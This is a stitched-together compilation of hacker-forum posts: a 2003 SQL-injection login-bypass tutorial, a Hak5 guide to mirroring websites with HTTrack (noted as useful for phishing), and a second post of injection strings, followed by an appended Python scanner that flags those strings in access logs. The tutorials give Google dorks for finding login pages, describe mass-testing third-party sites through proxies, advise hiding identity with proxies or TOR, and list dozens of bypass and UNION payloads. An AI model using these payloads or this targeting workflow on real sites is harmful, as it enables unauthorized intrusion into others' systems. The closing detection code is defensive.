The DBA darkLord of All

SQL injection ()

a basic Login SQL injection tutorial

by ComSec aka ZSL

5 June 2003

One of the major problems with SQL is its poor security; the issues surround the login and URL strings.

This tutorial is not going to go into detail on why these strings work, as I am not a coder; I just know what I know, and it works.

SEARCH:

admin\login.asp
login.asp

With these two search strings you will have plenty of targets to choose from... finding one that's vulnerable is another question.


WHAT I DO :

First let me go into details on how I go about my research.

I have gathered plenty of injection strings for quite some time, like those below, and have just been granted access to a test machine and will be testing for many variations and new inputs... legally, cool... provided by my good friend Gsecur aka ICE, also an Astal member, http://governmentsecurity.org "thanks mate"... gives me a chance to concentrate on what I am doing and not be looking over my shoulder.

INJECTION STRINGS:HOW ?

This is the easiest part... very simple.

On the login page just enter something like

user:admin (you don't even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

Some sites will have just a password, so

password:' or 1=1--

In fact I have compiled a combo list with strings like this to use on my chosen targets... there are plenty of strings about; the list below is a sample of the most commonly used.

There are many other strings, involving for instance UNION table access via reading the error pages' table structure;
thus an attack with this method will eventually reveal admin U\P paths... but that's another paper.

The ones I am interested in are quick access to targets.

PROGRAM

I tried several programs to use with these search strings and up to now only Ares has performed well, with quite a bit
of success with a combo list formatted this way; yesterday I loaded 40 eastern targets with 18 positive hits in a few minutes.
How long would it take to go through 40 sites cutting and pasting each string??

combo example:

admin:' or a=a--
admin:' or 1=1--

And so on... it doesn't have to be admin, it can be anything you want... the most important part is example:' or 1=1-- this is our injection
string.

Now the only trudge part is finding targets to exploit... so I tend to search, say, Google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.c...G=Google+Search

17,000 possible targets; trying various searches spews out plenty more.


Now, using proxies set in my browser, I then click through interesting targets... seeing what's what on the site pages; if interesting
I then cut and paste the URL as a possible target... after an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

And so on... in a couple of hours you can build up quite a list... the reason I don't select all results or spider for login pages is
I want to keep the noise level low... my ISP... well, enough said... plus at the moment I am on dial-up, so too slow for me.

I then save the list, fire up Ares and enter (1) a proxy list (2) my target IP list (3) my combo list... start... now I don't want to go into
problems with users using Ares... thing is I know it works for me...

Sit back and wait... any vulnerable target will show up in the hits box... now when it finds a target it will spew all the strings on that site as vulnerable... you have to go through each one on the site by cutting and pasting the string till you find the right one... but the thing is you know you CAN access the site... really I need a program that will return the hit with a click on the URL and ignore false outputs.

I am still looking... thing is it saves quite a bit of time going to each site and each string to find it's not exploitable.

There you go, you should have access to your vulnerable target by now.

Another thing: you can use the strings in URLs where user=?; edit the URL to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as the login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

Mirror Websites with HTTrack

Monday, September 12th, 2011 from Hak5.org
GOAL: 
Download a copy of any website and host it locally with a one-line web server. You can also use this for backing up a website or doing some prototyping. The dark side will most likely use this technique in building their phishing sites.


MATERIALS:
HTTrack - Available for Windows, Mac and Linux, this open source, multilingual mirroring tool sports multiple web targets, user-selectable recursion levels, resume features and more.


STEP-BY-STEP:
1. Begin by creating a directory to store the website mirror.
Example:  mkdir ~/websites and cd !$

2. Run httrack. Once you get familiar with the tool you can automate the process with flags and such, but the straight forward interactive wizard is much appreciated.

3. Start by naming the project, then provide a directory to save the files and the URL of your website or websites separated by commas or spaces. Finally we'll choose how we'd like to download. I prefer option 2, mirroring the web site with the wizard.

4. We can specify if we're using a proxy, what filetypes we would like, and any additional options. Finally we're provided with a command line so that next time we can perform the same action without the prompts.
Example: httrack -W -O /path -%v

5. Hit Y for Yes and the process will complete in just a moment, or maybe longer depending on the size of the site and how recursive you want to get. Finally we can see our finished work with ls. You'll notice HTTrack creates a log and cache directory, and all of the saved files will be found in your website directory.


6. With our site newly mirrored and the html files sitting happily in our directory we can actually browse to them with a webserver locally in one command.  
Issue: python -m SimpleHTTPServer 
A webserver will be spawned serving up your current working directory on port 8000. Now we can head over to our web browser and check out http://localhost:8000 to see our finished product.

Webagedon - Dark Lord of All!

SQL Injection Strings:
1. Google search "admin login.asp" - be creative, use Google hacking tips to "fine tune" your searches.

2. On the results, pick interesting subjects.

3. At this time you should think about hiding your identity. Look into proxy servers available on the internet:
www.youhide.com
https://kproxy.com/
or you might want to invest some time with TOR.

4. After you have verified that you cannot be identified, you can then proceed with your academic endeavor.

SQL Strings you can try:
username: admin
password: 1'or'1'='1

SQL Injection 101, Login tricks
  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
more...

admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a to come later...
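The same strings seen from the defender's side, as an added example that is not part of the original post and applies to both this list and ComSec's variations above: a small scanner that parses Common Log Format access-log lines, URL-decodes the request path and flags the tautology, comment-terminator and UNION patterns those lists share. The log lines, addresses and paths are constructed for the demo, and the regular expressions are generalizations of the listed strings rather than any product's signatures.

```python
"""Flagging the login-bypass strings above in web server access logs.

Added example, not from the original post. Log lines, addresses and paths
below are constructed; the patterns generalize the string lists above.
"""
import re
from urllib.parse import unquote_plus

# Common Log Format: ip ident user [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Heuristics generalized from the lists above (assumption: the strings arrive
# URL-encoded, so the path is decoded before matching).
SQLI_PATTERNS = [
    # quote, optional ')', then a tautology:  ' or 1=1  /  ') or ('x'='x  /  " or "a"="a
    re.compile(r"""['"][)\s]*or\s+[(\s]*\S+\s*=\s*\S+""", re.I),
    # quote followed by a comment opener:  admin'--  /  admin' #  /  admin'/*
    re.compile(r"""['"]\s*(--|#|/\*)"""),
    # ' union select 1, ...
    re.compile(r"""\bunion\s+select\b""", re.I),
]


def find_sqli(line: str):
    """Return (ip, decoded path, pattern index) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))
    for idx, pat in enumerate(SQLI_PATTERNS):
        if pat.search(decoded):
            return m.group("ip"), decoded, idx
    return None


def scan(lines):
    """Run find_sqli over an iterable of log lines; returns the hits in order."""
    return [hit for hit in map(find_sqli, lines) if hit is not None]


# Constructed sample log (RFC 5737 documentation addresses, made-up paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Sep/2011:10:01:02 +0000] "GET /login.asp?user=admin&pass=%27+or+1%3D1-- HTTP/1.1" 302 0',
    '203.0.113.7 - - [12/Sep/2011:10:01:05 +0000] "GET /login.asp?user=admin%27--&pass=x HTTP/1.1" 302 0',
    '198.51.100.2 - - [12/Sep/2011:10:02:00 +0000] "GET /login.asp?user=alice&pass=Summer2011 HTTP/1.1" 200 1024',
    '203.0.113.7 - - [12/Sep/2011:10:02:10 +0000] "GET /search.asp?q=%27%29+or+%28%27x%27%3D%27x HTTP/1.1" 200 2048',
    '198.51.100.2 - - [12/Sep/2011:10:02:30 +0000] "GET /articles.asp?title=Tom%27s+or+Jerry%27s HTTP/1.1" 200 4096',
    '203.0.113.7 - - [12/Sep/2011:10:03:00 +0000] "GET /news.asp?id=1%27+union+select+1%2C2-- HTTP/1.1" 500 512',
    '198.51.100.2 - - [12/Sep/2011:10:03:30 +0000] "POST /login.asp HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, path, idx in scan(SAMPLE_LOG):
        print(f"{ip:14} pattern#{idx} {path}")
```

Two caveats a practitioner should keep in mind: the apostrophe-plus-"or" line about Tom's and Jerry's shows why the quote must be immediately followed by the keyword (looser patterns drown in false positives), and the final POST line shows the blind spot of this approach, since the form fields the login tricks above are typed into travel in the request body, which a standard access log never records; catching those needs application-level logging or a WAF in front of the login handler.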